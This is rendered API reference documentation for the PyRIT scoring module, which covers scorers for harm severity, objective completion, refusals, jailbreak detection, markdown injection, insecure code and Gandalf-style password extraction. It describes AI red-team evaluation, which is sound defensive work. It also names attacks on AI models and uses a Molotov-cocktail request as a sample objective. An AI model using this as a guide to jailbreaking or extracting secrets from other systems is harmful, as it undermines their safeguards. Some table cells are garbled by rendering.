Skip to article frontmatterSkip to article content
Site not loading correctly?

This may be due to an incorrect BASE_URL configuration. See the MyST Documentation for reference.

pyrit.score

Scoring functionality for evaluating AI model responses across various dimensions including harm detection, objective completion, and content classification.

Functions

create_conversation_scorer

create_conversation_scorer(scorer: Scorer, validator: Optional[ScorerPromptValidator] = None) → Scorer

Create a ConversationScorer that inherits from the same type as the wrapped scorer.

This factory dynamically creates a ConversationScorer class that inherits from the wrapped scorer’s base class (FloatScaleScorer or TrueFalseScorer), ensuring the returned scorer is an instance of both ConversationScorer and the wrapped scorer’s type.

ParameterTypeDescription
scorerScorerThe scorer to wrap for conversation-level evaluation. Must be an instance of FloatScaleScorer or TrueFalseScorer.
validatorOptional[ScorerPromptValidator]Optional validator override. If not provided, uses the wrapped scorer’s validator. Defaults to None.

Returns:

Raises:

get_all_harm_metrics

get_all_harm_metrics(harm_category: str) → list[ScorerMetricsWithIdentity[HarmScorerMetrics]]

Load all harm scorer metrics for a specific harm category.

Returns a list of ScorerMetricsWithIdentity[HarmScorerMetrics] objects that wrap the scorer’s identity information and its performance metrics, enabling clean attribute access like entry.metrics.mean_absolute_error or entry.metrics.harm_category.

ParameterTypeDescription
harm_categorystrThe harm category to load metrics for (e.g., “hate_speech”, “violence”).

Returns:

get_all_objective_metrics

get_all_objective_metrics(file_path: Optional[Path] = None) → list[ScorerMetricsWithIdentity[ObjectiveScorerMetrics]]

Load all objective scorer metrics with full scorer identity for comparison.

Returns a list of ScorerMetricsWithIdentity[ObjectiveScorerMetrics] objects that wrap the scorer’s identity information and its performance metrics, enabling clean attribute access like entry.metrics.accuracy or entry.metrics.f1_score.

ParameterTypeDescription
file_pathOptional[Path]Path to a specific JSONL file to load. If not provided, uses the default path: SCORER_EVALS_PATH / “objective” / “objective_achieved_metrics.jsonl” Defaults to None.

Returns:

AudioFloatScaleScorer

Bases: FloatScaleScorer

A scorer that processes audio files by transcribing them and scoring the transcript.

The AudioFloatScaleScorer transcribes audio to text using Azure Speech-to-Text, then scores the transcript using a FloatScaleScorer.

Constructor Parameters:

ParameterTypeDescription
text_capable_scorerFloatScaleScorerA FloatScaleScorer capable of processing text. This scorer will be used to evaluate the transcribed audio content.
validatorOptional[ScorerPromptValidator]Validator for the scorer. Defaults to audio_path data type validator. Defaults to None.
use_entra_authOptional[bool]Whether to use Entra ID authentication for Azure Speech. Defaults to True if None. Defaults to None.

AudioTrueFalseScorer

Bases: TrueFalseScorer

A scorer that processes audio files by transcribing them and scoring the transcript.

The AudioTrueFalseScorer transcribes audio to text using Azure Speech-to-Text, then scores the transcript using a TrueFalseScorer.

Constructor Parameters:

ParameterTypeDescription
text_capable_scorerTrueFalseScorerA TrueFalseScorer capable of processing text. This scorer will be used to evaluate the transcribed audio content.
validatorOptional[ScorerPromptValidator]Validator for the scorer. Defaults to audio_path data type validator. Defaults to None.
use_entra_authOptional[bool]Whether to use Entra ID authentication for Azure Speech. Defaults to True if None. Defaults to None.

AzureContentFilterScorer

Bases: FloatScaleScorer

A scorer that uses Azure Content Safety API to evaluate text and images for harmful content.

This scorer analyzes content across multiple harm categories (hate, self-harm, sexual, violence) and returns a score for each category in the range [0, 1], where higher scores indicate more severe content. Supports both text and image inputs.

Constructor Parameters:

ParameterTypeDescription
endpoint`Optional[strNone]`
api_key`Optional[strCallable[[], str
harm_categoriesOptional[list[TextCategory]]The harm categories you want to query for as defined in azure.ai.contentsafety.models.TextCategory. If not provided, defaults to all categories. Defaults to None.
validatorOptional[ScorerPromptValidator]Custom validator for the scorer. Defaults to None. Defaults to None.

Methods:

evaluate_async

evaluate_async(file_mapping: Optional[ScorerEvalDatasetFiles] = None, num_scorer_trials: int = 3, update_registry_behavior: RegistryUpdateBehavior = None, max_concurrency: int = 10) → Optional[ScorerMetrics]

Evaluate this scorer against human-labeled datasets.

AzureContentFilterScorer requires exactly one harm category to be configured for evaluation. This ensures each score corresponds to exactly one category in the ground truth dataset.

ParameterTypeDescription
file_mappingOptional[ScorerEvalDatasetFiles]Optional ScorerEvalDatasetFiles configuration. If not provided, uses the mapping based on the configured harm category. Defaults to None.
num_scorer_trialsintNumber of times to score each response. Defaults to 3. Defaults to 3.
update_registry_behaviorRegistryUpdateBehaviorControls how existing registry entries are handled. - SKIP_IF_EXISTS (default): Check registry for existing results. If found, return cached metrics. - ALWAYS_UPDATE: Always run evaluation and overwrite any existing registry entry. - NEVER_UPDATE: Always run evaluation but never write to registry (for debugging). Defaults to RegistryUpdateBehavior.SKIP_IF_EXISTS. Defaults to None.
max_concurrencyintMaximum concurrent scoring requests. Defaults to 10. Defaults to 10.

Returns:

Raises:

BatchScorer

A utility class for scoring prompts in batches in a parallelizable and convenient way.

This class provides functionality to score existing prompts stored in memory without any target interaction, making it a pure scoring utility.

Constructor Parameters:

ParameterTypeDescription
batch_sizeintThe (max) batch size for sending prompts. Defaults to 10. Note: If using a scorer that takes a prompt target, and providing max requests per minute on the target, this should be set to 1 to ensure proper rate limit management. Defaults to 10.

Methods:

score_responses_by_filters_async

score_responses_by_filters_async(scorer: Scorer, attack_id: Optional[str | uuid.UUID] = None, conversation_id: Optional[str | uuid.UUID] = None, prompt_ids: Optional[list[str] | list[uuid.UUID]] = None, labels: Optional[dict[str, str]] = None, sent_after: Optional[datetime] = None, sent_before: Optional[datetime] = None, original_values: Optional[list[str]] = None, converted_values: Optional[list[str]] = None, data_type: Optional[str] = None, not_data_type: Optional[str] = None, converted_value_sha256: Optional[list[str]] = None, objective: str = '') → list[Score]

Score the responses that match the specified filters.

ParameterTypeDescription
scorerScorerThe Scorer object to use for scoring.
attack_id`Optional[struuid.UUID]`
conversation_id`Optional[struuid.UUID]`
prompt_ids`Optional[list[str]list[uuid.UUID]]`
labelsOptional[dict[str, str]]A dictionary of labels. Defaults to None. Defaults to None.
sent_afterOptional[datetime]Filter for prompts sent after this datetime. Defaults to None. Defaults to None.
sent_beforeOptional[datetime]Filter for prompts sent before this datetime. Defaults to None. Defaults to None.
original_valuesOptional[list[str]]A list of original values. Defaults to None. Defaults to None.
converted_valuesOptional[list[str]]A list of converted values. Defaults to None. Defaults to None.
data_typeOptional[str]The data type to filter by. Defaults to None. Defaults to None.
not_data_typeOptional[str]The data type to exclude. Defaults to None. Defaults to None.
converted_value_sha256Optional[list[str]]A list of SHA256 hashes of converted values. Defaults to None. Defaults to None.
objectivestrA task is used to give the scorer more context on what exactly to score. A task might be the request prompt text or the original attack model’s objective. Note: the same task is applied to all matched prompts. Defaults to an empty string. Defaults to ''.

Returns:

Raises:

ConsoleScorerPrinter

Bases: ScorerPrinter

Console printer for scorer information with enhanced formatting.

This printer formats scorer details for console display with optional color coding, proper indentation, and visual hierarchy. Colors can be disabled for consoles that don’t support ANSI characters.

Constructor Parameters:

ParameterTypeDescription
indent_sizeintNumber of spaces for indentation. Must be non-negative. Defaults to 2. Defaults to 2.
enable_colorsboolWhether to enable ANSI color output. When False, all output will be plain text without colors. Defaults to True. Defaults to True.

Methods:

print_harm_scorer(scorer_identifier: ComponentIdentifier, harm_category: str) → None

Print harm scorer information including type, nested scorers, and evaluation metrics.

This method displays:

ParameterTypeDescription
scorer_identifierComponentIdentifierThe scorer identifier to print information for.
harm_categorystrThe harm category for looking up metrics (e.g., “hate_speech”, “violence”).
print_objective_scorer(scorer_identifier: ComponentIdentifier) → None

Print objective scorer information including type, nested scorers, and evaluation metrics.

This method displays:

ParameterTypeDescription
scorer_identifierComponentIdentifierThe scorer identifier to print information for.

ContentClassifierPaths

Bases: enum.Enum

Paths to content classifier YAML files.

ConversationScorer

Bases: Scorer, ABC

Scorer that evaluates entire conversation history rather than individual messages.

This scorer wraps another scorer (FloatScaleScorer or TrueFalseScorer) and evaluates the full conversation context. Useful for multi-turn conversations where context matters (e.g., psychosocial harms that emerge over time or persuasion/deception over many messages).

The ConversationScorer dynamically inherits from the same base class as the wrapped scorer, ensuring proper type compatibility.

Note: This class cannot be instantiated directly. Use create_conversation_scorer() factory instead.

Methods:

validate_return_scores

validate_return_scores(scores: list[Score]) → None

Validate scores by delegating to the wrapped scorer’s validation.

ParameterTypeDescription
scoreslist[Score]The scores to validate.

DecodingScorer

Bases: TrueFalseScorer

Scorer that checks if the request values are in the output using a text matching strategy.

This scorer checks if any of the user request values (original_value, converted_value, or metadata decoded_text) match the response converted_value using the configured text matching strategy.

Constructor Parameters:

ParameterTypeDescription
text_matcherOptional[TextMatching]The text matching strategy to use. Defaults to ExactTextMatching with case_sensitive=False. Defaults to None.
categoriesOptional[list[str]]Optional list of categories for the score. Defaults to None. Defaults to None.
aggregatorTrueFalseAggregatorFuncThe aggregator function to use. Defaults to TrueFalseScoreAggregator.OR. Defaults to TrueFalseScoreAggregator.OR.
validatorOptional[ScorerPromptValidator]Custom validator. Defaults to None. Defaults to None.

FloatScaleScoreAggregator

Namespace for float scale score aggregators that return a single aggregated score.

All aggregators return a list containing one ScoreAggregatorResult that combines all input scores together, preserving all categories.

FloatScaleScorer

Bases: Scorer

Base class for scorers that return floating-point scores in the range [0, 1].

This scorer evaluates prompt responses and returns numeric scores indicating the degree to which a response exhibits certain characteristics. Each piece in a request response is scored independently, returning one score per piece.

Constructor Parameters:

ParameterTypeDescription
validatorScorerPromptValidatorA validator object used to validate scores.

Methods:

get_scorer_metrics

get_scorer_metrics() → Optional[HarmScorerMetrics]

Get evaluation metrics for this scorer from the configured evaluation result file.

Returns:

validate_return_scores

validate_return_scores(scores: list[Score]) → None

Validate that the returned scores are within the valid range [0, 1].

Raises:

FloatScaleScorerAllCategories

Namespace for float scale score aggregators that combine all categories.

These aggregators ignore category boundaries and aggregate all scores together, returning a single ScoreAggregatorResult with all categories combined.

FloatScaleScorerByCategory

Namespace for float scale score aggregators that group by category.

These aggregators return multiple ScoreAggregatorResult objects (one per category). Useful for scorers like AzureContentFilterScorer that return multiple scores per item.

FloatScaleThresholdScorer

Bases: TrueFalseScorer

A scorer that applies a threshold to a float scale score to make it a true/false score.

Constructor Parameters:

ParameterTypeDescription
scorerFloatScaleScorerThe underlying float scale scorer to use.
thresholdfloatThe threshold value between 0 and 1. Scores >= threshold are True, otherwise False.
float_scale_aggregatorFloatScaleAggregatorFuncThe aggregator function to use for combining multiple float scale scores. Defaults to FloatScaleScoreAggregator.MAX. Defaults to FloatScaleScoreAggregator.MAX.

GandalfScorer

Bases: TrueFalseScorer

A scorer for evaluating responses in Gandalf challenges.

This scorer checks whether a password or secret has been successfully extracted from a Gandalf-style challenge by submitting the response to the Gandalf API and checking if the password is correct. Returns True if the password was successfully extracted.

Constructor Parameters:

ParameterTypeDescription
levelGandalfLevelThe Gandalf challenge level to score against.
chat_targetPromptChatTargetThe chat target used for password extraction.
validatorOptional[ScorerPromptValidator]Custom validator. Defaults to text data type validator. Defaults to None.
score_aggregatorTrueFalseAggregatorFuncAggregator for combining scores. Defaults to TrueFalseScoreAggregator.OR. Defaults to TrueFalseScoreAggregator.OR.

HarmHumanLabeledEntry

Bases: HumanLabeledEntry

A class that represents a human-labeled dataset entry for a specific harm category. This class includes the Messages and a list of human scores, which are floats between 0.0 and 1.0 inclusive, representing the degree of harm severity where 0.0 is minimal and 1.0 is maximal. The harm category is a string that represents the type of harm (e.g., “hate_speech”, “misinformation”, etc.).

HarmScorerEvaluator

Bases: ScorerEvaluator

A class that evaluates a harm scorer against HumanLabeledDatasets of type HARM.

HarmScorerMetrics

Bases: ScorerMetrics

Metrics for evaluating a harm scorer against a HumanLabeledDataset.

Methods:

get_harm_definition

get_harm_definition() → Optional[HarmDefinition]

Load and return the HarmDefinition object for this metrics instance.

Loads the harm definition YAML file specified in harm_definition and returns it as a HarmDefinition object. The result is cached after the first load.

Returns:

Raises:

HumanInTheLoopScorerGradio

Bases: TrueFalseScorer

Create scores from manual human input using Gradio and adds them to the database.

In the future this will not be a TrueFalseScorer. However, it is all that is supported currently.

.. deprecated:: This Gradio-based scorer is deprecated and will be removed in v0.13.0. Use the React-based GUI instead.

Constructor Parameters:

ParameterTypeDescription
open_browserboolIf True, the scorer will open the Gradio interface in a browser instead of opening it in PyWebview. Defaults to False. Defaults to False.
validatorOptional[ScorerPromptValidator]Custom validator. Defaults to None. Defaults to None.
score_aggregatorTrueFalseAggregatorFuncAggregator for combining scores. Defaults to TrueFalseScoreAggregator.OR. Defaults to TrueFalseScoreAggregator.OR.

Methods:

retrieve_score

retrieve_score(request_prompt: MessagePiece, objective: Optional[str] = None) → list[Score]

Retrieve a score from the human evaluator through the RPC server.

ParameterTypeDescription
request_promptMessagePieceThe message piece to be scored.
objectiveOptional[str]The objective to evaluate against. Defaults to None. Defaults to None.

Returns:

HumanLabeledDataset

A class that represents a human-labeled dataset, including the entries and each of their corresponding human scores. This dataset is used to evaluate PyRIT scorer performance via the ScorerEvaluator class. HumanLabeledDatasets can be constructed from a CSV file.

Constructor Parameters:

ParameterTypeDescription
namestrThe name of the human-labeled dataset. For datasets of uniform type, this is often the harm category (e.g. hate_speech) or objective. It will be used in the naming of metrics (JSON) and model scores (CSV) files when evaluation is run on this dataset.
entriesList[HumanLabeledEntry]A list of entries in the dataset.
metrics_typeMetricsTypeThe type of the human-labeled dataset, either HARM or OBJECTIVE.
versionstrThe version of the human-labeled dataset.
harm_definitionstrPath to the harm definition YAML file for HARM datasets. Defaults to None.
harm_definition_versionstrVersion of the harm definition YAML file. Used to ensure the human labels match the scoring criteria version. Defaults to None.

Methods:

from_csv

from_csv(csv_path: Union[str, Path], metrics_type: MetricsType, dataset_name: Optional[str] = None, version: Optional[str] = None, harm_definition: Optional[str] = None, harm_definition_version: Optional[str] = None) → HumanLabeledDataset

Load a human-labeled dataset from a CSV file with standard column names.

Expected CSV format:

You can optionally include a # comment line at the top of the CSV file to specify the dataset version and harm definition path. The format is:

ParameterTypeDescription
csv_pathUnion[str, Path]The path to the CSV file.
metrics_typeMetricsTypeThe type of the human-labeled dataset, either HARM or OBJECTIVE.
dataset_name(str, Optional)The name of the dataset. If not provided, it will be inferred from the CSV file name. Defaults to None.
version(str, Optional)The version of the dataset. If not provided here, it will be inferred from the CSV file if a dataset_version comment line is present. Defaults to None.
harm_definition(str, Optional)Path to the harm definition YAML file. If not provided here, it will be inferred from the CSV file if a harm_definition comment is present. Defaults to None.
harm_definition_version(str, Optional)Version of the harm definition YAML file. If not provided here, it will be inferred from the CSV file if a harm_definition_version comment is present. Defaults to None.

Returns:

Raises:

get_harm_definition

get_harm_definition() → Optional[HarmDefinition]

Load and return the HarmDefinition object for this dataset.

For HARM datasets, this loads the harm definition YAML file specified in harm_definition and returns it as a HarmDefinition object. The result is cached after the first load.

Returns:

Raises:

validate

validate() → None

Validate that the dataset is internally consistent.

Checks that all entries match the dataset’s metrics_type and, for HARM datasets, that all entries have the same harm_category, that harm_definition is specified, and that the harm definition file exists and is loadable.

Raises:

HumanLabeledEntry

A class that represents an entry in a dataset of assistant responses that have been scored by humans. It is used to evaluate PyRIT scorer performance as measured by degree of alignment with human labels. This class includes the Messages and a list of human-assigned scores, which are floats between 0.0 and 1.0 inclusive (representing degree of severity) for harm datasets, and booleans for objective datasets.

InsecureCodeScorer

Bases: FloatScaleScorer

A scorer that uses an LLM to evaluate code snippets for potential security vulnerabilities. Configuration is loaded from a YAML file for dynamic prompts and instructions.

Constructor Parameters:

ParameterTypeDescription
chat_targetPromptChatTargetThe target to use for scoring code security.
system_prompt_pathOptional[Union[str, Path]]Path to the YAML file containing the system prompt. Defaults to the default insecure code scoring prompt if not provided. Defaults to None.
validatorOptional[ScorerPromptValidator]Custom validator for the scorer. Defaults to None. Defaults to None.

LikertScaleEvalFiles

Configuration for evaluating a Likert scale scorer on a set of dataset files.

LikertScalePaths

Bases: enum.Enum

Enum containing Likert scale configurations including YAML paths and evaluation file mappings.

Each enum value is a tuple of (yaml_path, evaluation_files) where:

MarkdownInjectionScorer

Bases: TrueFalseScorer

A scorer that detects markdown injection attempts in text responses.

This scorer checks for the presence of markdown syntax patterns that could be used for injection attacks, such as links, images, or other markdown constructs that might be exploited. Returns True if markdown injection is detected.

Constructor Parameters:

ParameterTypeDescription
validatorOptional[ScorerPromptValidator]Custom validator. Defaults to None. Defaults to None.
score_aggregatorTrueFalseAggregatorFuncThe aggregator function to use. Defaults to TrueFalseScoreAggregator.OR. Defaults to TrueFalseScoreAggregator.OR.

MetricsType

Bases: Enum

Enum representing the type of metrics when evaluating scorers on human-labeled datasets.

ObjectiveHumanLabeledEntry

Bases: HumanLabeledEntry

A class that represents a human-labeled dataset entry for a specific objective. This class includes the Messages and a list of human scores, which are booleans indicating whether the response/conversation meets the objective (e.g., 0 for not meeting the objective, 1 for meeting the objective). The objective is a string that represents the objective (e.g., "how to make a Molotov cocktail?).

ObjectiveScorerEvaluator

Bases: ScorerEvaluator

A class that evaluates an objective scorer against HumanLabeledDatasets of type OBJECTIVE.

ObjectiveScorerMetrics

Bases: ScorerMetrics

Metrics for evaluating an objective scorer against a HumanLabeledDataset.

PlagiarismMetric

Bases: Enum

Enum representing different plagiarism detection metrics.

PlagiarismScorer

Bases: FloatScaleScorer

A scorer that measures plagiarism by computing word-level similarity between the AI response and a reference text.

This scorer implements three similarity metrics:

  1. Word-level longest common subsequence (LCS)

  2. Word-level Levenshtein similarity

  3. Word-level n-gram Jaccard similarity

Constructor Parameters:

ParameterTypeDescription
reference_textstrThe reference text to compare against.
metricPlagiarismMetricThe plagiarism detection metric to use. Defaults to PlagiarismMetric.LCS. Defaults to PlagiarismMetric.LCS.
nintThe n-gram size for n-gram similarity. Defaults to 5. Defaults to 5.
validatorOptional[ScorerPromptValidator]Custom validator for the scorer. Defaults to None. Defaults to None.

PromptShieldScorer

Bases: TrueFalseScorer

Returns true if an attack or jailbreak has been detected by Prompt Shield.

Constructor Parameters:

ParameterTypeDescription
prompt_shield_targetPromptShieldTargetThe Prompt Shield target to use for scoring.
validatorOptional[ScorerPromptValidator]Custom validator. Defaults to None. Defaults to None.
score_aggregatorTrueFalseAggregatorFuncThe aggregator function to use. Defaults to TrueFalseScoreAggregator.OR. Defaults to TrueFalseScoreAggregator.OR.

QuestionAnswerScorer

Bases: TrueFalseScorer

A class that represents a question answering scorer.

Constructor Parameters:

ParameterTypeDescription
correct_answer_matching_patternslist[str]A list of patterns to check for in the response. If any pattern is found in the response, the score will be True. These patterns should be format strings that will be formatted with the correct answer metadata. Defaults to CORRECT_ANSWER_MATCHING_PATTERNS. Defaults to CORRECT_ANSWER_MATCHING_PATTERNS.
categoryOptional[list[str]]Optional list of categories for the score. Defaults to None. Defaults to None.
validatorOptional[ScorerPromptValidator]Custom validator. Defaults to None. Defaults to None.
score_aggregatorTrueFalseAggregatorFuncThe aggregator function to use. Defaults to TrueFalseScoreAggregator.OR. Defaults to TrueFalseScoreAggregator.OR.

RefusalScorerPaths

Bases: enum.Enum

Paths to refusal scorer system prompt YAML files.

Each enum value represents a different refusal detection strategy:

RegistryUpdateBehavior

Bases: Enum

Enum representing how the evaluation registry should be updated.

Scorer

Bases: Identifiable, abc.ABC

Abstract base class for scorers.

Constructor Parameters:

ParameterTypeDescription
validatorScorerPromptValidatorValidator for message pieces and scorer configuration.

Methods:

evaluate_async

evaluate_async(file_mapping: Optional[ScorerEvalDatasetFiles] = None, num_scorer_trials: int = 3, update_registry_behavior: RegistryUpdateBehavior = None, max_concurrency: int = 10) → Optional[ScorerMetrics]

Evaluate this scorer against human-labeled datasets.

Uses file mapping to determine which datasets to evaluate and how to aggregate results.

ParameterTypeDescription
file_mappingOptional[ScorerEvalDatasetFiles]Optional ScorerEvalDatasetFiles configuration. If not provided, uses the scorer’s configured evaluation_file_mapping. Maps input file patterns to an output result file. Defaults to None.
num_scorer_trialsintNumber of times to score each response (for measuring variance). Defaults to 3. Defaults to 3.
update_registry_behaviorRegistryUpdateBehaviorControls how existing registry entries are handled. - SKIP_IF_EXISTS (default): Check registry for existing results. If found, return cached metrics. - ALWAYS_UPDATE: Always run evaluation and overwrite any existing registry entry. - NEVER_UPDATE: Always run evaluation but never write to registry (for debugging). Defaults to RegistryUpdateBehavior.SKIP_IF_EXISTS. Defaults to None.
max_concurrencyintMaximum number of concurrent scoring requests. Defaults to 10. Defaults to 10.

Returns:

Raises:

get_identifier

get_identifier() → ComponentIdentifier

Get the scorer’s identifier with eval_hash always attached.

Overrides the base Identifiable.get_identifier() so that to_dict() always emits the eval_hash key.

Returns:

get_scorer_metrics

get_scorer_metrics() → Optional[ScorerMetrics]

Get evaluation metrics for this scorer from the configured evaluation result file.

Looks up metrics by this scorer’s identity hash in the JSONL result file. The result file may contain entries for multiple scorer configurations.

Subclasses must implement this to return the appropriate metrics type:

Returns:

scale_value_float

scale_value_float(value: float, min_value: float, max_value: float) → float

Scales a value from 0 to 1 based on the given min and max values. E.g. 3 stars out of 5 stars would be .5.

ParameterTypeDescription
valuefloatThe value to be scaled.
min_valuefloatThe minimum value of the range.
max_valuefloatThe maximum value of the range.

Returns:

score_async

score_async(message: Message, objective: Optional[str] = None, role_filter: Optional[ChatMessageRole] = None, skip_on_error_result: bool = False, infer_objective_from_request: bool = False) → list[Score]

Score the message, add the results to the database, and return a list of Score objects.

ParameterTypeDescription
messageMessageThe message to be scored.
objectiveOptional[str]The task or objective based on which the message should be scored. Defaults to None. Defaults to None.
role_filterOptional[ChatMessageRole]Only score messages with this exact stored role. Use “assistant” to score only real assistant responses, or “simulated_assistant” to score only simulated responses. Defaults to None (no filtering). Defaults to None.
skip_on_error_resultboolIf True, skip scoring if the message contains an error. Defaults to False. Defaults to False.
infer_objective_from_requestboolIf True, infer the objective from the message’s previous request when objective is not provided. Defaults to False. Defaults to False.

Returns:

Raises:

score_image_async

score_image_async(image_path: str, objective: Optional[str] = None) → list[Score]

Score the given image using the chat target.

ParameterTypeDescription
image_pathstrThe path to the image file to be scored.
objectiveOptional[str]The objective based on which the image should be scored. Defaults to None. Defaults to None.

Returns:

score_image_batch_async

score_image_batch_async(image_paths: Sequence[str], objectives: Optional[Sequence[str]] = None, batch_size: int = 10) → list[Score]

Score a batch of images asynchronously.

ParameterTypeDescription
image_pathsSequence[str]Sequence of paths to image files to be scored.
objectivesOptional[Sequence[str]]Optional sequence of objectives corresponding to each image. If provided, must match the length of image_paths. Defaults to None. Defaults to None.
batch_sizeintMaximum number of images to score concurrently. Defaults to 10. Defaults to 10.

Returns:

Raises:

score_prompts_batch_async

score_prompts_batch_async(messages: Sequence[Message], objectives: Optional[Sequence[str]] = None, batch_size: int = 10, role_filter: Optional[ChatMessageRole] = None, skip_on_error_result: bool = False, infer_objective_from_request: bool = False) → list[Score]

Score multiple prompts in batches using the provided objectives.

ParameterTypeDescription
messagesSequence[Message]The messages to be scored.
objectivesSequence[str]The objectives/tasks based on which the prompts should be scored. Must have the same length as messages. Defaults to None.
batch_sizeintThe maximum batch size for processing prompts. Defaults to 10. Defaults to 10.
role_filterOptional[ChatMessageRole]If provided, only score pieces with this role. Defaults to None (no filtering). Defaults to None.
skip_on_error_resultboolIf True, skip scoring pieces that have errors. Defaults to False. Defaults to False.
infer_objective_from_requestboolIf True and objective is empty, attempt to infer the objective from the request. Defaults to False. Defaults to False.

Returns:

Raises:

score_response_async

score_response_async(response: Message, objective_scorer: Optional[Scorer] = None, auxiliary_scorers: Optional[list[Scorer]] = None, role_filter: ChatMessageRole = 'assistant', objective: Optional[str] = None, skip_on_error_result: bool = True) → dict[str, list[Score]]

Score a response using an objective scorer and optional auxiliary scorers.

ParameterTypeDescription
responseMessageResponse containing pieces to score.
objective_scorerOptional[Scorer]The main scorer to determine success. Defaults to None. Defaults to None.
auxiliary_scorersOptional[List[Scorer]]List of auxiliary scorers to apply. Defaults to None. Defaults to None.
role_filterChatMessageRoleOnly score pieces with this exact stored role. Defaults to “assistant” (real responses only, not simulated). Defaults to 'assistant'.
objectiveOptional[str]Task/objective for scoring context. Defaults to None. Defaults to None.
skip_on_error_resultboolIf True, skip scoring pieces that have errors. Defaults to True. Defaults to True.

Returns:

Raises:

score_response_multiple_scorers_async

score_response_multiple_scorers_async(response: Message, scorers: list[Scorer], role_filter: ChatMessageRole = 'assistant', objective: Optional[str] = None, skip_on_error_result: bool = True) → list[Score]

Score a response using multiple scorers in parallel.

This method applies each scorer to the first scorable response piece (filtered by role and error), and returns all scores. This is typically used for auxiliary scoring where all results are needed.

ParameterTypeDescription
responseMessageThe response containing pieces to score.
scorersList[Scorer]List of scorers to apply.
role_filterChatMessageRoleOnly score pieces with this exact stored role. Defaults to “assistant” (real responses only, not simulated). Defaults to 'assistant'.
objectiveOptional[str]Optional objective description for scoring context. Defaults to None.
skip_on_error_resultboolIf True, skip scoring pieces that have errors (default: True). Defaults to True.

Returns:

score_text_async

score_text_async(text: str, objective: Optional[str] = None) → list[Score]

Scores the given text based on the task using the chat target.

ParameterTypeDescription
textstrThe text to be scored.
objectiveOptional[str]The task based on which the text should be scored Defaults to None.

Returns:

validate_return_scores

validate_return_scores(scores: list[Score]) → None

Validate the scores returned by the scorer. Because some scorers may require specific Score types or values.

ParameterTypeDescription
scoreslist[Score]The scores to be validated.

ScorerEvalDatasetFiles

Configuration for evaluating a scorer on a set of dataset files.

Maps input dataset files (via glob patterns) to an output result file. Multiple files matching the patterns will be concatenated before evaluation.

ScorerEvaluator

Bases: abc.ABC

A class that evaluates an LLM scorer against HumanLabeledDatasets, calculating appropriate metrics and saving them to a file.

Constructor Parameters:

ParameterTypeDescription
scorerScorerThe scorer to evaluate.

Methods:

evaluate_dataset_async

evaluate_dataset_async(labeled_dataset: HumanLabeledDataset, num_scorer_trials: int = 1, max_concurrency: int = 10) → ScorerMetrics

Run the evaluation for the scorer/policy combination on the passed in HumanLabeledDataset.

This method performs pure computation without side effects (no file writing). It can be called directly with an in-memory HumanLabeledDataset for experiments that don’t use file-based datasets (e.g., iterative rubric tuning with custom splits).

ParameterTypeDescription
labeled_datasetHumanLabeledDatasetThe HumanLabeledDataset to evaluate the scorer against.
num_scorer_trialsintThe number of trials to run the scorer on all responses. Defaults to 1.
max_concurrencyintMaximum number of concurrent scoring requests. Defaults to 10. Defaults to 10.

Returns:

Raises:

from_scorer

from_scorer(scorer: Scorer, metrics_type: Optional[MetricsType] = None) → ScorerEvaluator

Create a ScorerEvaluator based on the type of scoring.

ParameterTypeDescription
scorerScorerThe scorer to evaluate.
metrics_typeMetricsTypeThe type of scoring, either HARM or OBJECTIVE. If not provided, it will default to OBJECTIVE for true/false scorers and HARM for all other scorers. Defaults to None.

Returns:

run_evaluation_async

run_evaluation_async(dataset_files: ScorerEvalDatasetFiles, num_scorer_trials: int = 3, update_registry_behavior: RegistryUpdateBehavior = RegistryUpdateBehavior.SKIP_IF_EXISTS, max_concurrency: int = 10) → Optional[ScorerMetrics]

Evaluate scorer using dataset files configuration.

The update_registry_behavior parameter controls how existing registry entries are handled:

ParameterTypeDescription
dataset_filesScorerEvalDatasetFilesScorerEvalDatasetFiles configuration specifying glob patterns for input files and a result file name.
num_scorer_trialsintNumber of scoring trials per response. Defaults to 3. Defaults to 3.
update_registry_behaviorRegistryUpdateBehaviorControls how existing registry entries are handled. Defaults to RegistryUpdateBehavior.SKIP_IF_EXISTS. Defaults to RegistryUpdateBehavior.SKIP_IF_EXISTS.
max_concurrencyintMaximum number of concurrent scoring requests. Defaults to 10. Defaults to 10.

Returns:

Raises:

ScorerMetrics

Base dataclass for storing scorer evaluation metrics.

This class provides methods for serializing metrics to JSON and loading them from JSON files.

Methods:

from_json

from_json(file_path: Union[str, Path]) → T

Load the metrics from a JSON file.

ParameterTypeDescription
file_pathUnion[str, Path]The path to the JSON file.

Returns:

Raises:

to_json

to_json() → str

Convert the metrics to a JSON string.

Returns:

ScorerMetricsWithIdentity

Bases: Generic[M]

Wrapper that combines scorer metrics with the scorer’s identity information.

This class provides a clean interface for working with evaluation results, allowing access to both the scorer configuration and its performance metrics.

Generic over the metrics type M, so:

ScorerPrinter

Bases: ABC

Abstract base class for printing scorer information.

This interface defines the contract for printing scorer details including type information, nested sub-scorers, and evaluation metrics from the registry. Implementations can render output to console, logs, files, or other outputs.

Methods:

print_harm_scorer(scorer_identifier: ComponentIdentifier, harm_category: str) → None

Print harm scorer information including type, nested scorers, and evaluation metrics.

This method displays:

ParameterTypeDescription
scorer_identifierComponentIdentifierThe scorer identifier to print information for.
harm_categorystrThe harm category for looking up metrics (e.g., “hate_speech”, “violence”).
print_objective_scorer(scorer_identifier: ComponentIdentifier) → None

Print objective scorer information including type, nested scorers, and evaluation metrics.

This method displays:

ParameterTypeDescription
scorer_identifierComponentIdentifierThe scorer identifier to print information for.

ScorerPromptValidator

Validates message pieces and scorer configurations.

This class provides validation for scorer inputs, ensuring that message pieces meet required criteria such as data types, roles, and metadata requirements.

Constructor Parameters:

ParameterTypeDescription
supported_data_typesOptional[Sequence[PromptDataType]]Data types that the scorer supports. Defaults to all data types if not provided. Defaults to None.
required_metadataOptional[Sequence[str]]Metadata keys that must be present in message pieces. Defaults to empty list. Defaults to None.
supported_rolesOptional[Sequence[ChatMessageRole]]Message roles that the scorer supports. Defaults to all roles if not provided. Defaults to None.
max_pieces_in_responseOptional[int]Maximum number of pieces allowed in a response. Defaults to None (no limit). Defaults to None.
max_text_lengthOptional[int]Maximum character length for text data type pieces. Defaults to None (no limit). Defaults to None.
enforce_all_pieces_validOptional[bool]Whether all pieces must be valid or just at least one. Defaults to False. Defaults to False.
raise_on_no_valid_piecesOptional[bool]Whether to raise ValueError when no pieces are valid. Defaults to False, allowing scorers to handle empty results gracefully (e.g., returning False for blocked responses). Set to True to raise an exception instead. Defaults to False.
is_objective_requiredboolWhether an objective must be provided for scoring. Defaults to False. Defaults to False.

Methods:

is_message_piece_supported

is_message_piece_supported(message_piece: MessagePiece) → bool

Check if a message piece is supported by this validator.

